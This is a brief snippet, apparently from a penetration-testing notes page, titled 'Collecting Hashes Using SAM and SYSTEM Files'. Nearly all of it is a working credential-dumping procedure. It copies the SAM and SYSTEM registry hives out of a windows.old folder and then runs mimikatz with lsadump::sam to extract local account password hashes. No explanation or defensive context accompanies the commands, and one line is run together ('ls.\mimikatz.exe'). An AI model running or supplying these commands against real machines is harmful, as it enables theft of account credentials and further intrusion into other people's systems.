Collecting Hashes Using SAM and SYSTEM Files
Collecting Hashes Using SAM and SYSTEM Files
copy C:\windows.old\Windows\System32\SAM C:\temp
copy C:\windows.old\Windows\System32\SYSTEM C:\temp
ls.\mimikatz.exe "log" "lsadump::sam /system:C:\temp\SYSTEM /sam:C:\temp\SAM" "exit"Last updated